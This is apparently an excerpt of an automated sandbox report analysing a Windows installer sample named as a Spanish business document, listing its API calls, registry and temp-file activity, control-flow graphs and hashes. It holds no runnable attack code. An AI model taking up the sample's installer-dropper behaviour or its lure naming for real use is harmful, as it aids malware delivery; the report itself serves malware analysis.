                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID: Times New Roman
                                                • API String ID: 3808545654-927190056
                                                • Opcode ID: e9dc967046a9833b494e13a4fbbc470b8de16a0e7eb7b9edd9fcccda2063d4ab
                                                • Instruction ID: 65d3cf27749cc92dd64e462d7a068a1de8cb11dbe253a65c0e26eefc01b1c80e
                                                • Opcode Fuzzy Hash: e9dc967046a9833b494e13a4fbbc470b8de16a0e7eb7b9edd9fcccda2063d4ab
                                                • Instruction Fuzzy Hash: B8015271544245EFE7006BB4AF4AA9E7FB5BF55301F14097DE142BA1E2CBB80006AB2D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 699 40657c-40659c GetSystemDirectoryW 700 4065a0-4065a2 699->700 701 40659e 699->701 702 4065b3-4065b5 700->702 703 4065a4-4065ad 700->703 701->700 705 4065b6-4065e9 wsprintfW LoadLibraryExW 702->705 703->702 704 4065af-4065b1 703->704 704->705
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
                                                • wsprintfW.USER32 ref: 004065CE
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004065E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925
                                                • Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                • Instruction ID: 5ba2db083709ae0eaf9cf6759a8f1877d4d75d4363d7664b3b34a8d65426c280
                                                • Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                • Instruction Fuzzy Hash: 4AF0F670910219FADF10AB64EE0EF9B366CAB00304F50403AA546F11D0EB7CDA25CBA8

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 706 4023ea-402430 call 402d48 call 402c53 * 2 RegCreateKeyExW 713 402436-40243e 706->713 714 402adb-402aea 706->714 716 402440-40244d call 402c53 lstrlenW 713->716 717 402451-402454 713->717 716->717 718 402456-402467 call 402c31 717->718 719 402468-40246b 717->719 718->719 723 40247c-402490 RegSetValueExW 719->723 724 40246d-402477 call 40317b 719->724 728 402492 723->728 729 402495-402573 RegCloseKey 723->729 724->723 728->729 729->714 731 4028a1-4028a8 729->731 731->714
                                                APIs
                                                • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402428
                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz2C67.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402448
                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsz2C67.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402488
                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz2C67.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CloseCreateValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp
                                                • API String ID: 1356686001-1818543702
                                                • Opcode ID: ece1090bea345cee063836fd41dcee0df6b571bc993627b666dc800a2ef4f993
                                                • Instruction ID: 4be5953a60dfee5a88bc6a75bc26a7970e9a4d525f64453ad6d2d9daaf41070d
                                                • Opcode Fuzzy Hash: ece1090bea345cee063836fd41dcee0df6b571bc993627b666dc800a2ef4f993
                                                • Instruction Fuzzy Hash: 85216F71E00118BFEB10AFA4DE89DAE7B78EB04358F11843AF505B71D1DBB88D419B68

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 732 4025ae-4025c0 733 4025c2-4025db call 402c31 732->733 734 4025dd-4025e0 732->734 742 402620-402626 733->742 736 402611-40261e call 402c53 lstrlenW 734->736 737 4025e2-40260f call 402c53 WideCharToMultiByte lstrlenA 734->737 736->742 737->742 744 4028a1-402aea 742->744 745 40262c-402637 call 406172 742->745 751 402639-40263c 745->751 752 40264d-402656 call 405e99 745->752 751->752 753 40263e-402647 call 405ec8 751->753 756 40265b 752->756 753->744 753->752 756->744
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsz2C67.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000400,?,?,00000021), ref: 004025FE
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsz2C67.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000400,?,?,00000021), ref: 00402609
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp$C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll
                                                • API String ID: 3109718747-2279021923
                                                • Opcode ID: 5d65a23732dd4ccdc7984c572b6a18305c86c71b12900251bd97c122480645d6
                                                • Instruction ID: 0226f840347654c2ecdc96a32175c32971a63fe26a5c545fd31e5d705646dbf5
                                                • Opcode Fuzzy Hash: 5d65a23732dd4ccdc7984c572b6a18305c86c71b12900251bd97c122480645d6
                                                • Instruction Fuzzy Hash: CE11C872A05714BADB106BB18E8999E7765AF00359F20453FF102F61C1DAFC8982575E
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405E34
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe",00403448,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405E4F
                                                Strings
                                                • nsa, xrefs: 00405E23
                                                • "C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe", xrefs: 00405E16
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E1B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: "C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-1225190900
                                                • Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                • Instruction ID: 4cf6052b0ced346fb1ee4b1f894cf66bb827df7868a0d4c9989a51242fd2e3ec
                                                • Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                • Instruction Fuzzy Hash: 9BF09076700608FBDB008F59DD05A9BBBBDEB95750F10403AFD40F7180E6B09A548B64
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402CB4
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402CF0
                                                • RegCloseKey.ADVAPI32(?), ref: 00402CF9
                                                • RegCloseKey.ADVAPI32(?), ref: 00402D1E
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402D3C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: e13740883462cc78ac6c5afbeaba50eff29be6575239932ced4c036c4fe7d772
                                                • Instruction ID: 6ed1dcd439a9d73e7b184d3b9e055cec6739c9c837aa6d28afee44abb1cd8dac
                                                • Opcode Fuzzy Hash: e13740883462cc78ac6c5afbeaba50eff29be6575239932ced4c036c4fe7d772
                                                • Instruction Fuzzy Hash: 6611377150010DFFEF219F90DE89DAE7B6DFB64348F10007AFA01A11A0D7B58E59AA69
                                                APIs
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                  • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                  • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                  • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2987306905.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2987274852.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987339691.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987366231.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarylstrcpy
                                                • String ID:
                                                • API String ID: 1791698881-3916222277
                                                • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00403297
                                                  • Part of subcall function 00403402: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410
                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004032CA
                                                • SetFilePointer.KERNELBASE(0000652F,00000000,00000000,00414ED0,00004000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000), ref: 004033C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: FilePointer$CountTick
                                                • String ID: xc
                                                • API String ID: 1092082344-2460966970
                                                • Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                • Instruction ID: 6f8adcdc05782984f9803186be869087625e4848c31a04748361169110b3332d
                                                • Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                • Instruction Fuzzy Hash: 66314A72614205DBD7109F29FEC49663BA9F74039A714423FE900F22E0DBB9AD018B9D
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
                                                • Instruction ID: 75e6d6340c5f39a85289ca98609147a27814c24a1fb1496c30dcde5ce6f9f3d4
                                                • Opcode Fuzzy Hash: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
                                                • Instruction Fuzzy Hash: 1A21C171908219AEEF04AFA4DE4AABE7BB4FF44304F14453EF505BA1D0D7B88541DB28
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                  • Part of subcall function 00405371: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00402EAD,00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000), ref: 004053CC
                                                  • Part of subcall function 00405371: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll), ref: 004053DE
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID: ?n
                                                • API String ID: 334405425-903412113
                                                • Opcode ID: 69b6fb779f4b81ccf18d003185774e5fcf78f1de7481548dcecb4aa74f4b6a0d
                                                • Instruction ID: e4abfbb00710fbb49cfbee30f6c47c6475fc16ace361a0eeed54ffc6686eb32c
                                                • Opcode Fuzzy Hash: 69b6fb779f4b81ccf18d003185774e5fcf78f1de7481548dcecb4aa74f4b6a0d
                                                • Instruction Fuzzy Hash: EB21AD71900215EBCF206FA5CE4999E7971BF04358F60453BF511B51E0CBBD8982DA6D
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00406109
                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040612A
                                                • RegCloseKey.KERNELBASE(?,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040614D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Call
                                                • API String ID: 3677997916-1824292864
                                                • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                • Instruction ID: 5a49725d9b8b462efd799bce316dcbaad7059079bb26d9a6c1e38be835131f9e
                                                • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                • Instruction Fuzzy Hash: 2F015A3110020AEACF218F26ED08EDB3BA9EF88391F01403AFD55D6220D774D964CBA5
                                                APIs
                                                • GlobalFree.KERNEL32(006E3F20), ref: 00401BE1
                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
